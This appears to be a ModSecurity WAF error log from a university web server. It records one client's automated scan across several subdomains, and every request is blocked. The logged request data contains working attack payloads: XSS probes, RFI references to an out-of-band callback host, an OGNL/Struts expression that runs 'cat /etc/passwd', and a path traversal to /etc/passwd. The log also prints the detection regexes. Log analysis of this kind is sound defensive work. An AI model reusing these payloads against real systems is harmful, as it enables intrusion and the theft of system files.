[Tue Aug 29 11:51:06.267493 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15OsCo-f0AAAhoHO8AAAAl"]
[Tue Aug 29 11:51:06.272763 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15OsCo-f0AAAknEMgAAAAB"]
[Tue Aug 29 11:51:06.278958 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15OsCo-f0AAAlIBgIAAAAn"]
[Tue Aug 29 11:51:06.305499 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15OsCo-f0AAAlIBgMAAAAn"]
[Tue Aug 29 11:51:06.325203 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:settingsform[newpassword1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: ' onclick= found within ARGS:settingsform[newpassword1]: pdteam' onclick='alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15OsCo-f0AAAhoHPEAAAAl"]
[Tue Aug 29 11:51:06.339631 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expression. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22) ,# found within ARGS:expression: (#_memberAccess[\\x22allowStaticMethodAccess\\x22]=true,#foo=new java.lang.Boolean(\\x22false\\x22) ,#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream()))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/devmode.action"] [unique_id "ZO15OsCo-f0AAAfWOCMAAAAL"]
[Tue Aug 29 11:51:06.548061 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO15OsCo-f0AAAl4sW4AAAAf"]
[Tue Aug 29 11:51:06.586647 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/exchweb/bin/redir.asp"] [unique_id "ZO15OsCo-f0AAAlIBgcAAAAn"]
[Tue Aug 29 11:51:06.627538 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onerror= found within ARGS:username: <img/src/onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/cas/v1/tickets/"] [unique_id "ZO15OsCo-f0AAAm5BvEAAAAA"]
[Tue Aug 29 11:51:08.571488 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:log: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15PMCo-f0AAAmIbOkAAAAo"]
[Tue Aug 29 11:51:08.572062 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:errors[fu-disallowed-mime-type][0][name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:errors[fu-disallowed-mime-type][0][name]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15PMCo-f0AAAknENAAAAAB"]
[Tue Aug 29 11:51:08.637227 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:errors[fu-disallowed-mime-type][0][name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:errors[fu-disallowed-mime-type][0][name]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15PMCo-f0AAAm7m8gAAAAE"]
[Tue Aug 29 11:51:08.641553 2023] [:error] [pid 2501] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:log: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15PMCo-f0AAAnFrvsAAAAP"]
[Tue Aug 29 11:51:08.643377 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:errors[fu-disallowed-mime-type][0][name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:errors[fu-disallowed-mime-type][0][name]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15PMCo-f0AAAnGkHQAAAAR"]
[Tue Aug 29 11:51:08.664250 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:errors[fu-disallowed-mime-type][0][name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:errors[fu-disallowed-mime-type][0][name]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15PMCo-f0AAAm5BvsAAAAA"]
[Tue Aug 29 11:51:08.691785 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:errors[fu-disallowed-mime-type][0][name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:errors[fu-disallowed-mime-type][0][name]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15PMCo-f0AAAnEqSwAAAAO"]
[Tue Aug 29 11:51:09.532925 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:country: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15PcCo-f0AAAm-MbcAAAAI"]
[Tue Aug 29 11:51:09.545227 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:country: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15PcCo-f0AAAkr0DsAAAAC"]
[Tue Aug 29 11:51:09.549054 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:country: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15PcCo-f0AAAfWOC0AAAAL"]
[Tue Aug 29 11:51:09.553147 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:settingsform[firstname]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:settingsform[firstname]: pdteam' onclick='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15PcCo-f0AAAhhczoAAAAd"]
[Tue Aug 29 11:51:09.554224 2023] [:error] [pid 2490] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:settingsform[firstname]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:settingsform[firstname]: pdteam' onclick='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15PcCo-f0AAAm63KUAAAAD"]
[Tue Aug 29 11:51:09.556027 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:settingsform[firstname]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: ' onclick= found within ARGS:settingsform[firstname]: pdteam' onclick='alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15PcCo-f0AAAnHQc8AAAAT"]
[Tue Aug 29 11:51:09.564478 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:country: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15PcCo-f0AAAnEqS4AAAAO"]
[Tue Aug 29 11:51:09.570660 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:country: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15PcCo-f0AAAm7m8sAAAAE"]
[Tue Aug 29 11:51:09.572224 2023] [:error] [pid 2446] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:errors[fu-disallowed-mime-type][0][name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:errors[fu-disallowed-mime-type][0][name]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO15PcCo-f0AAAmOBcMAAAAU"]
[Tue Aug 29 11:51:09.579462 2023] [:error] [pid 2498] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:settingsform[firstname]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: ' onclick= found within ARGS:settingsform[firstname]: pdteam' onclick='alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/install.php"] [unique_id "ZO15PcCo-f0AAAnCKxYAAAAK"]
[Tue Aug 29 11:51:09.590242 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:settingsform[firstname]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: ' onclick= found within ARGS:settingsform[firstname]: pdteam' onclick='alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15PcCo-f0AAAnEqS8AAAAO"]
[Tue Aug 29 11:51:10.714432 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/tools/sourceViewer/index.html"] [unique_id "ZO15PsCo-f0AAAjtdFYAAAAX"]
